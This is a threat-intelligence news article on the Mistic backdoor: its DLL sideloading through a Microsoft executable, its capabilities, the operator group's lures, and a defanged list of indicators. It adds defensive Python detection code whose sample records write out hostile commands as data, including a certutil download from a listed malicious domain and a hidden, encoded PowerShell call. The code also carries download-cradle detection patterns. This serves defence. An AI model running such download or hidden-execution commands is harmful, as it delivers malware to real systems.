CyberSecurityNews

Mistic Backdoor Blends With Microsoft Endpoint Security Tooling to Evade Detection


A new and stealthy backdoor named Mistic has been quietly targeting corporate networks since April 2026, disguising itself using the names and appearance of legitimate Microsoft endpoint security components.

This clever camouflage helps it avoid detection, allowing attackers to maintain a persistent, low-profile foothold inside compromised environments. Security teams across multiple industries are now on alert as incidents continue to emerge.

Mistic has hit organizations in insurance, education, information technology, and professional services. The attacks are opportunistic in nature, meaning the group casts a wide net and evaluates which compromised networks are worth selling access to.

That access is then offered to ransomware affiliates and other criminal groups who pay for a ready-made entry point into enterprise systems.

Analysts from Symantec identified the threat and connected it to a financially motivated cybercrime group tracked as Woodgnat, also known as KongTuke.

According to a Symantec report shared with Cyber Security News (CSN), the Symantec Threat Hunter Team found Mistic deployed alongside ModeloRAT, a remote access tool tied to attacks involving Qilin, Akira, Rhysida, Black Basta, Interlock, and 8Base.

Mistic was first publicly documented by Zscaler, which tracks it as MLTBackdoor. Symantec’s investigation went deeper, tying the backdoor more firmly to Woodgnat’s expanding toolkit and confirming its role in a broader criminal supply chain.

The group’s goal is not to launch the final attack itself but to sell high-value access to others who will.

What makes Mistic especially dangerous is how well it hides. Once loaded, the backdoor runs in memory rather than writing further files to disk (the on-disk components seen in these attacks are the loader, DLLs and installer packages listed in the IoCs below), and it carries a built-in kill switch that lets it erase itself when no longer needed.

These traits make it extremely difficult to detect and allow attackers to operate quietly inside a network for extended periods.

Mistic reaches its target through a technique known as DLL sideloading, where a legitimate, signed executable is tricked into loading a malicious DLL that has been placed where the executable looks for its dependencies.

In investigated attacks, a legitimate Microsoft file called MpExtMs.exe was used to sideload a malicious DLL named EndpointDlp.dll, a name directly associated with Microsoft endpoint security tooling.

This naming choice helps the backdoor appear like trusted software running in the background.

A loader called version.dll sits in the middle of this process. It hooks two Windows functions, GetModuleFileNameW and LoadLibraryW, directing execution toward the malicious DLL while keeping normal appearances intact.
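The sideloading chain described above leaves a recognisable shape in image-load telemetry: a Microsoft-signed host binary that loads an unsigned DLL carrying a Microsoft-looking name from the same, non-system directory. The following is an added example of triaging Sysmon-style ImageLoad (Event ID 7) records for that shape; it is not code from Symantec, Zscaler or the article. The records are constructed, and the C:\ProgramData\EndpointSecurity staging path is an assumption, not a location reported for Mistic.

```python
"""Sideload triage over Sysmon-style ImageLoad (Event ID 7) records.

Added example, not code from Symantec, Zscaler or the article. The records
are constructed; the C:\\ProgramData\\EndpointSecurity directory is an assumed
staging path, not one reported for Mistic.
"""
import ntpath
from dataclasses import dataclass

# Directories a Microsoft-signed binary normally loads its own DLLs from.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# DLL names the Mistic chain abuses (per the article). version.dll is also a
# long-standing generic sideload/proxy target.
WATCHED_DLLS = {"endpointdlp.dll", "version.dll"}


@dataclass
class ImageLoad:
    image: str           # host process path (Sysmon "Image")
    image_loaded: str    # DLL path (Sysmon "ImageLoaded")
    host_signer: str     # Sysmon "Signature" for the host process
    dll_signer: str      # signer of the DLL, "" when unsigned
    dll_sig_status: str  # Sysmon "SignatureStatus": Valid, Unavailable, ...


def under_trusted_dir(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)


def sideload_reasons(ev: ImageLoad) -> list[str]:
    """Return why this load looks like sideloading; an empty list means clean."""
    reasons = []
    if not ev.host_signer.lower().startswith("microsoft"):
        return reasons  # this heuristic only cares about trusted hosts loading untrusted code
    host = ntpath.basename(ev.image)
    host_dir = ntpath.dirname(ev.image).lower()
    dll_dir = ntpath.dirname(ev.image_loaded).lower()
    dll = ntpath.basename(ev.image_loaded).lower()
    dll_trusted = under_trusted_dir(ev.image_loaded)

    # 1. A watched name (EndpointDlp.dll, version.dll) loaded from outside system dirs.
    if dll in WATCHED_DLLS and not dll_trusted:
        reasons.append(f"{dll} loaded from {dll_dir} instead of a system directory")
    # 2. Microsoft-signed host loading an unsigned or non-Microsoft DLL from an untrusted dir.
    dll_signed_ms = (ev.dll_sig_status.lower() == "valid"
                     and ev.dll_signer.lower().startswith("microsoft"))
    if not dll_signed_ms and not dll_trusted:
        reasons.append(f"{host} (Microsoft-signed) loaded non-Microsoft or unsigned {dll}")
    # 3. Host and DLL dropped side by side in a writable location: the classic sideload layout.
    if host_dir == dll_dir and not under_trusted_dir(ev.image):
        reasons.append(f"{host} and {dll} co-located in {host_dir}")
    return reasons


def triage(events):
    """Map each suspicious host image to its accumulated reasons; clean events are dropped."""
    hits = {}
    for ev in events:
        reasons = sideload_reasons(ev)
        if reasons:
            hits.setdefault(ev.image, []).extend(reasons)
    return hits


# Constructed sample: a benign system load, a staged MpExtMs.exe chain, a third-party app.
SAMPLE = [
    ImageLoad(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\version.dll",
              "Microsoft Windows", "Microsoft Windows", "Valid"),
    ImageLoad(r"C:\ProgramData\EndpointSecurity\MpExtMs.exe",  # assumed staging path
              r"C:\ProgramData\EndpointSecurity\version.dll",
              "Microsoft Corporation", "", "Unavailable"),
    ImageLoad(r"C:\ProgramData\EndpointSecurity\MpExtMs.exe",
              r"C:\ProgramData\EndpointSecurity\EndpointDlp.dll",
              "Microsoft Corporation", "", "Unavailable"),
    ImageLoad(r"C:\Users\alice\AppData\Local\Vendor\tool.exe",
              r"C:\Users\alice\AppData\Local\Vendor\helper.dll",
              "Vendor Inc", "", "Unavailable"),
]

if __name__ == "__main__":
    for image, reasons in triage(SAMPLE).items():
        print(image)
        for r in reasons:
            print("  -", r)
```

The three checks deliberately fire independently: a DLL with a watched name in a system directory is normal, and a vendor binary loading its own unsigned helper from its own folder is not sideloading of a trusted host, so neither produces an alert. The staged MpExtMs.exe records trip all three checks.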

A separate .NET DLL was also deployed as a credential stealer, displaying a fake login screen to harvest user passwords from unsuspecting victims.

Beyond hiding well, Mistic is highly capable. It can upload and download files, move or delete data, create folders, run remote code in memory, and adjust its check-in frequency with the attacker’s command-and-control server. This gives operators strong control over any network they manage to infiltrate.

Woodgnat’s Expanding Attack Playbook

Woodgnat has been active since at least May 2024 and has steadily refined its attack methods. The group compromises WordPress sites and injects JavaScript to profile visitors before pushing social engineering lures that trick users into running malicious commands.

These lures have evolved through ClickFix and FileFix tactics to a newer approach called CrashFix, which crashes a victim’s browser and presents a fake fix that installs malware.

Since April 2026, Woodgnat has also been using fake IT helpdesk scenarios through Microsoft Teams chats to push users into running PowerShell commands.

Once executed, a script chain downloads a portable Python environment and launches ModeloRAT, after which attackers conduct deep reconnaissance, harvest credentials, and set up multiple persistence paths.

This layered approach makes the group difficult to fully remove even after initial discovery.

Security researchers recommend monitoring for unusual DLL sideloading activity, especially when legitimate Microsoft executables load unexpected files.

Organizations should also watch for suspicious use of built-in Windows tools such as curl.exe, certutil, WMIC, and PowerShell in contexts outside normal operations.

Tuning endpoint detection toward in-memory execution and tracking abnormal network behavior remain among the most practical defenses against this threat.
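To make the recommendations above concrete, here is an added example (not vendor code) that scores process-creation records for the living-off-the-land patterns named in this article (curl.exe, certutil, WMIC, PowerShell) and matches command lines against a subset of the IoCs published below. The IoCs are kept in their defanged form and only re-fanged inside the matching function, as the note under the IoC table recommends. The process records are constructed, and the Microsoft Teams process names used as a parent-process signal are assumed.

```python
"""Living-off-the-land triage over process-creation records, with the
article's IoCs matched from their defanged form.

Added example, not vendor code. The process records are constructed, the Teams
process names are assumed, and the IoC subset is taken from this article's table.
"""
import ntpath
import re

# Published defanged; re-fanged only inside the detection pipeline.
IOC_DOMAINS_DEFANGED = ["thomphon[.]com", "sql-updater-service[.]com", "updater-worelos[.]com"]
IOC_IPS_DEFANGED = ["142[.]93[.]242[.]144", "198[.]13[.]159[.]44"]
SUSPICIOUS_PARENTS = {"ms-teams.exe", "teams.exe"}  # assumed Teams image names

# (process-name regex, command-line regex, description); command lines match case-insensitively.
LOLBIN_RULES = [
    (r"^certutil\.exe$", r"-urlcache|-decode|-encode",
     "certutil used to download or decode a payload"),
    (r"^curl\.exe$", r"\s(-o|--output)\b|https?://\S+\.(exe|msi|dll|ps1|zip)\b",
     "curl.exe fetching an executable artefact"),
    (r"^wmic\.exe$", r"process\s+call\s+create",
     "WMIC used to spawn a process"),
    (r"^(powershell|pwsh)\.exe$",
     r"-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|downloadstring|downloadfile",
     "PowerShell hidden, encoded or download-cradle execution"),
]


def refang(indicator: str) -> str:
    """Undo the publishing defang: 'hxxp://a[.]b' -> 'http://a.b'."""
    return re.sub(r"^hxxp", "http", indicator.replace("[.]", "."), flags=re.I)


IOC_NEEDLES = [refang(i).lower() for i in IOC_DOMAINS_DEFANGED + IOC_IPS_DEFANGED]


def score_record(rec: dict) -> tuple[int, list[str]]:
    """Score one record; 2 or more is worth an analyst's look."""
    name = ntpath.basename(rec["image"]).lower()
    cmd = rec["cmdline"].lower()
    score, reasons = 0, []
    for proc_re, cmd_re, why in LOLBIN_RULES:
        if re.search(proc_re, name) and re.search(cmd_re, cmd, re.I):
            score += 2
            reasons.append(why)
    for needle in IOC_NEEDLES:
        if needle in cmd:
            score += 3
            reasons.append(f"command line references IoC {needle}")
    if rec.get("parent", "").lower() in SUSPICIOUS_PARENTS:
        score += 1
        reasons.append("spawned from a Teams process (fake-helpdesk lure pattern)")
    return score, reasons


def triage(records, threshold=2):
    """Return (score, image, reasons) for records at or above the threshold, highest first."""
    out = []
    for rec in records:
        s, reasons = score_record(rec)
        if s >= threshold:
            out.append((s, rec["image"], reasons))
    return sorted(out, key=lambda t: -t[0])


# Constructed process-creation records, not captured telemetry.
SAMPLE = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://thomphon.com/update.msi C:\Users\Public\update.msi",
     "parent": "powershell.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
     "parent": "ms-teams.exe"},
    {"image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": 'wmic process call create "cmd /c whoami"',
     "parent": "cmd.exe"},
    {"image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://api.github.com/repos/example/project",
     "parent": "cmd.exe"},
]

if __name__ == "__main__":
    for s, image, reasons in triage(SAMPLE):
        print(s, image, "; ".join(reasons))
```

The plain curl.exe call to an API endpoint scores zero on purpose: the binaries themselves are legitimate, so the rules key on the download, decode, hidden-window and process-spawn arguments that distinguish abuse from routine administration, and an IoC hit outweighs any single tool pattern.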

Indicators of Compromise (IoCs):

Type | Indicator | Description
File Hash (SHA-256) | 1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984 | Backdoor.Mistic – endpointdlp.dll
File Hash (SHA-256) | 34d798a6c55e57ed0932b6499f4fbcb5454bdfca903307be101a0594b0ac07bc | Fake lockscreen – f.dll
File Hash (SHA-256) | 3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be | Backdoor.Mistic – aeff97fe.msi
File Hash (SHA-256) | 59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712 | Loader for backdoor – version.dll
File Hash (SHA-256) | 8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235 | Likely privilege escalation – n.dll
File Hash (SHA-256) | afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c | Backdoor.Mistic – endpointdlp.dll
File Hash (SHA-256) | db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5 | Backdoor.Mistic – endpointdlp.dll
File Hash (SHA-256) | f591275a8f014b29e567529d67c54eb7bb4473db1c38737d6bfd5b3d52c9344e | Backdoor.Mistic – 48b47c0.msi
File Hash (SHA-256) | fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a | Backdoor.Mistic – endpointdlp.dll
IP Address | 142[.]93[.]242[.]144 | C2 network indicator
IP Address | 144[.]31[.]53[.]78 | C2 network indicator
IP Address | 198[.]13[.]159[.]44 | C2 network indicator
IP Address | 199[.]91[.]221[.]42 | C2 network indicator
Domain | authorized-logins[.]net | Malicious C2 domain
Domain | b6w9m2z5x8q1v3k[.]top | Malicious C2 domain
Domain | carrolc[.]com | Malicious C2 domain
Domain | cj06y9v4xab[.]com | Malicious C2 domain
Domain | cwrtwright[.]com | Malicious C2 domain
Domain | defs[.]updater-worelos[.]com | Malicious C2 domain
Domain | ftps[.]upd-domain-goloro[.]com | Malicious C2 domain
Domain | grande-luna[.]top | Malicious C2 domain
URL | hxxp://thomphon[.]com/update.msi | Malware delivery URL
Domain | human-check[.]top | Malicious C2 domain
Domain | mail[.]authorized-logins[.]net | Malicious C2 domain
Domain | mailes[.]upd-domain-goloro[.]com | Malicious C2 domain
Domain | mails[.]updater-worelos[.]com | Malicious C2 domain
Domain | mueleer[.]com | Malicious C2 domain
Domain | nano[.]upscale-kolo[.]com | Malicious C2 domain
Domain | oeannon[.]com | Malicious C2 domain
Domain | php[.]authorized-logins[.]net | Malicious C2 domain
Domain | rotoa-upda-lo[.]com | Malicious C2 domain
Domain | sql-updater-service[.]com | Malicious C2 domain
Domain | sss[.]authorized-logins[.]net | Malicious C2 domain
Domain | thomphon[.]com | Malicious C2 domain
Domain | upd-domain-goloro[.]com | Malicious C2 domain
Domain | update[.]update-fall[.]com | Malicious C2 domain
Domain | updater-worelos[.]com | Malicious C2 domain
Domain | upscale-kolo[.]com | Malicious C2 domain
Domain | w3xasv14culvnqj[.]top | Malicious C2 domain

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
